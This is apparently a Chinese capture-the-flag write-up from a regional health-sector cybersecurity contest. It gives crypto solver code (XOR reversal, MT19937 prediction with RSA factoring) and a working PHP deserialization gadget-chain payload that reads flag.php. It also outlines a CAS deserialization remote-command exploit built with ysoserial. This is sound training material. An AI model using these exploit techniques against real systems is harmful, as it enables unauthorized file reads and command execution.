第一届新疆维吾尔自治区卫生行业网络安全大赛WP

第一届新疆维吾尔自治区卫生行业网络安全大赛WP

Misc-多余的base64

下载附件得到一张图片

使用010 Editor打开查看二进制数据

在文件结尾发现base64字符串，使用在线工具进行base64解码

Misc-栅栏先生弹起了他的58号贝斯

先base64解码，再栅栏解密，key 为7时出flag

Crypto-xxxor

原题:

import random
import string

def xor_encrypt(flag):
    """XOR each character of *flag* with its own random key and hex-encode it.

    One key in the inclusive range 31..128 is drawn per character with
    ``random.randint``. The XOR-ed characters are joined, encoded as UTF-8
    and returned as a hex string, together with the keys in draw order.

    Notes:
        * The key list is returned next to the ciphertext, so whoever holds
          both values can undo the XOR; this is obfuscation, not secrecy.
        * An XOR result of 128 or more takes more than one byte in UTF-8,
          so the hex string is not always two digits per character.
    """
    random_numbers = []
    cipher_chars = []
    for plain_char in flag:
        key = random.randint(31, 128)
        random_numbers.append(key)
        cipher_chars.append(chr(ord(plain_char) ^ key))
    cipher_text = "".join(cipher_chars)
    return cipher_text.encode('utf-8').hex(), random_numbers

# The flag value is masked in the published challenge source.
flag = "*************"
hex_encrypted_result, random_numbers_used = xor_encrypt(flag)
# Prints the hex ciphertext AND the per-character keys, i.e. everything
# needed to reverse the XOR.
print(hex_encrypted_result, random_numbers_used)

# Presumably the recorded output of a run with the real flag
# (hex ciphertext, then the key list):
#2310482b551c24440c3f091f216b5c0b6010442d4506296a485f7f76595f0d045d5e57357f094a0a4d2b
#[69, 124, 41, 76, 46, 44, 66, 114, 57, 92, 59, 39, 64, 70, 106, 105, 83, 41, 105, 79, 116, 62, 76, 71, 120, 108, 72, 70, 116, 111, 105, 101, 60, 58, 49, 86, 75, 61, 121, 111, 126, 86]

解题:

def xor_decrypt(hex_encrypted_flag, random_numbers):
    """Reverse the per-character XOR applied by the encryption script.

    The hex string is turned back into bytes and decoded as UTF-8, then the
    character at position ``i`` is XOR-ed with ``random_numbers[i]``.

    Args:
        hex_encrypted_flag: Hex string of the UTF-8 encoded ciphertext.
        random_numbers: Keys in the order they were used for encryption;
            must hold at least one entry per decoded character.

    Returns:
        The recovered plaintext string.

    Raises:
        IndexError: If ``random_numbers`` is shorter than the decoded text.
        ValueError: If the input is not valid hex or not valid UTF-8.
    """
    cipher_text = bytes.fromhex(hex_encrypted_flag).decode('utf-8')
    return "".join(
        chr(ord(cipher_char) ^ random_numbers[position])
        for position, cipher_char in enumerate(cipher_text)
    )

# Both inputs are copied from the comments at the end of the challenge source.
hex_encrypted_result = "2310482b551c24440c3f091f216b5c0b6010442d4506296a485f7f76595f0d045d5e57357f094a0a4d2b" # result produced by the encryption function
random_numbers_used = [69, 124, 41, 76, 46, 44, 66, 114, 57, 92, 59, 39, 64, 70, 106, 105, 83, 41, 105, 79, 116, 62, 76, 71, 120, 108, 72, 70, 116, 111, 105, 101, 60, 58, 49, 86, 75, 61, 121, 111, 126, 86] # list of random numbers produced by the encryption function

# XOR is its own inverse, so applying the same keys again yields the flag.
decrypted_flag = xor_decrypt(hex_encrypted_result, random_numbers_used)
print(decrypted_flag)

Crypto-crazycrazymix

原题:

import os
import random

from Crypto.Cipher import AES
from Crypto.Util.number import *

# Challenge generator. It RSA-encrypts the flag and appends everything the
# player receives to the file "log2": n, e, c, 0x500 PRNG outputs and one
# AES-CBC ciphertext, one integer per line.
flag = b'xxxxxxxxxxxxxxx'  # masked in the published source

# RSA with two 512-bit primes and public exponent 65537.
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x10001
m = bytes_to_long(flag)
c = pow(m, e, n)

# First three log lines: modulus, public exponent, RSA ciphertext.
logger = "".join(str(value) + "\n" for value in (n, e, c))

# NOTE(review): `random` is the Mersenne Twister (MT19937), which is not a
# cryptographic generator. Seeding it from os.urandom does not help once
# its outputs are published: 0x500 (1280) consecutive 32-bit outputs are
# logged here, more than the 624 words of internal state, so every later
# draw is predictable. Keys and IVs belong to os.urandom / `secrets`.
random.seed(os.urandom(16))
for i in range(0x500):
    logger += str(random.getrandbits(32)) + "\n"

# The AES key and IV are the next two 128-bit draws of that same generator.
kk = random.getrandbits(128)
ivv = random.getrandbits(128)
# NOTE(review): long_to_bytes() without a block size drops leading zero
# bytes, so a draw whose top byte is zero gives fewer than 16 bytes.
key = long_to_bytes(kk)
iv = long_to_bytes(ivv)

# The AES plaintext is p with its low 128 bits cleared, i.e. the high bits
# of one RSA prime are what this ciphertext protects.
m = long_to_bytes(((p >> 128) << 128))
h = AES.new(key, AES.MODE_CBC, iv)
c = h.encrypt(m)

# Last log line: the AES ciphertext as a decimal integer (no newline).
logger += str(bytes_to_long(c))

# Append mode: an existing "log2" is extended, not replaced.
open("log2", "a").write(logger)

解题:

from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes, bytes_to_long
from mt19937predictor import MT19937Predictor

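# Solver for the challenge log. Steps:
#   1. feed the logged 32-bit outputs to an MT19937 state-recovery helper,
#   2. regenerate the AES key and IV and decrypt the high bits of p,
#   3. recover the full p with the Sage snippet kept below for reference,
#   4. decrypt the RSA ciphertext with the factored modulus.
# The weakness being demonstrated: key material was drawn from a
# non-cryptographic PRNG whose outputs were published, and most of one RSA
# prime was protected only by that key.
predictor = MT19937Predictor()

# Log layout, one integer per line: n, e, c, 1280 PRNG words, AES ciphertext.
# Blank lines (for example a trailing newline) are skipped.
with open('log', 'r') as f:
    randoms = [int(line) for line in f if line.strip()]

n = randoms[0]
e = randoms[1]
c = randoms[2]

for num in randoms[3:1283]:  # the 1280 logged 32-bit PRNG outputs
    predictor.setrandbits(num, 32)

# The generator drew the key first and the IV second.
key_parts = predictor.getrandbits(128)
iv_parts = predictor.getrandbits(128)
# long_to_bytes() strips leading zero bytes unless a block size is given;
# pad to the AES block size so a value starting with 0x00 keeps a valid
# length (otherwise decrypt() rejects the ciphertext).
key = long_to_bytes(key_parts, 16)
iv = long_to_bytes(iv_parts, 16)
c_aes_bytes = long_to_bytes(randoms[-1], 16)

cipher = AES.new(key, AES.MODE_CBC, iv)
m_bytes = cipher.decrypt(c_aes_bytes)
ph = bytes_to_long(m_bytes)  # p with its low 128 bits cleared

# These two values are the inputs of the Sage step below.
print(ph)
print(n)

'''sage:
from sage.all import *
n = 102706395226544783414112641274672591894391416216878746807754644929912445175581335470378238742923176414999927249930670447943318136441452438270356357283197464475124949153678265709581089486951962323739833002935020314236558504922905124702232920469787037902411809326441573545744566574227951257179263944516978023591
p4 = 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820267870797284406644637992154008844763136
def phase3(high_p, n):
    R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
    p = high_p + x
    x0 = p.small_roots(X = 2^128, beta = 0.1)[0]

    P = int(p(x0))
    Q = n // P
    print(P)
    assert n == P*Q

e = 0x10001
phase3(p4, n)

# 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820597758447533439212561744757662901813449
'''
# Value printed by the Sage step for this particular log.
p = 12244220046384568355718560147957910646101667272989641924522439382568476328630595397224497779711283146202805078253820597758447533439212561744757662901813449

# The hard-coded p only fits the log it was computed from; fail loudly
# instead of printing garbage when a different log is loaded.
if n % p != 0:
    raise ValueError("p does not divide n; re-run the Sage step for this log")
q = n // p

# Standard RSA decryption: d = e^-1 mod (p-1)(q-1).
m = pow(c, pow(e, -1, (p - 1) * (q - 1)), n)

print(long_to_bytes(m))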

Reverse-esabbase

一眼看出 是base64换表加密

在线解密

Web-简单的bot

懂我暗示吗

根据题目想到 robots.txt 文件 访问得到 fffff14g.php 文件

再进行访问 在源代码注释中发现flag

Web-简单的反序列化

题目:

<?php

// The flag is in flag.php
// Suppress all PHP error reporting for this request.
error_reporting(0);
// Print this file's own source, syntax-highlighted, as the page body.
highlight_file(__FILE__);
// ini_set('display_errors', 1);
// // or turn error display off
// // ini_set('display_errors', 0);


/**
 * Plain holder for one value; the constructor stores its argument in
 * $girlfriend. Nothing else in the listing instantiates this class.
 */
class New_gril
{
    public $girlfriend;

    public function __construct($a)
    {
        $this->girlfriend = $a;
    }
}

/**
 * Echoes 'long long ago' followed by $girlfriend when the object is
 * destroyed.
 *
 * The concatenation casts $girlfriend to string, so if the property holds
 * an object, that object's __toString() runs inside the destructor. With
 * deserialized input the property value is chosen by whoever supplied the
 * serialized string.
 */
class Old_gril
{
    public $girlfriend = 'Ok';

    public function __destruct()
    {
        // The concatenation is evaluated in full before anything is echoed.
        echo 'long long ago' . $this->girlfriend;
    }
}

/**
 * String conversion echoes the contents of the path stored in $ok and
 * then returns the literal 'nice'.
 *
 * The path is used as-is, with no allow-list or directory restriction, so
 * any code that can set $ok decides which file is read.
 */
class Ok
{
    public $ok;

    public function __toString()
    {
        // Intended target in the challenge: flag.php
        $contents = file_get_contents($this->ok);
        echo $contents;
        return 'nice';
    }
}
// SECURITY: unserialize() is called on raw request data. The sender can
// make PHP instantiate any class declared above with property values of
// their choosing, and the magic methods of those classes (__destruct,
// __toString) then run on that data. Outside a lab, accept a data-only
// format such as JSON instead, or at least pass
// ['allowed_classes' => false] as the second argument.
unserialize($_POST['need']);
?>

解题:

<?php

/**
 * Copy of the challenge's Old_gril class, declared here so serialize()
 * emits the same class and property names.
 *
 * On destruction it echoes 'long long ago' followed by $girlfriend; the
 * concatenation casts the property to string.
 */
class Old_gril
{
    public $girlfriend = 'Ok';

    public function __destruct()
    {
        // The concatenation is evaluated in full before anything is echoed.
        echo 'long long ago' . $this->girlfriend;
    }
}

/**
 * Copy of the challenge's Ok class, declared here so serialize() emits
 * the same class and property names.
 *
 * String conversion echoes the contents of the path stored in $ok and
 * then returns the literal 'nice'.
 */
class Ok
{
    public $ok;

    public function __toString()
    {
        // Intended target in the challenge: flag.php
        $contents = file_get_contents($this->ok);
        echo $contents;
        return 'nice';
    }
}
// Object graph for the challenge: an Old_gril whose $girlfriend is an Ok
// pointing at flag.php. After deserialization on the server, destroying
// the Old_gril casts the Ok to string, which echoes the file.
$reader = new Ok();
$reader->ok = 'flag.php';

$exploit = new Old_gril();
$exploit->girlfriend = $reader;

// The serialized form is the value sent in the POST field 'need'.
$payload = serialize($exploit);
echo $payload;

?>
//O:8:"Old_gril":1:{s:10:"girlfriend";O:2:"Ok":1:{s:2:"ok";s:8:"flag.php";}}

在源代码中发现flag

Web-ezcas

通过搜索发现 cas 存在反序列化漏洞

解压 查看 用户名和密码

登录后抓包

使用 ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar 生成带回显的payload

在请求头中加入执行的命令 获取flag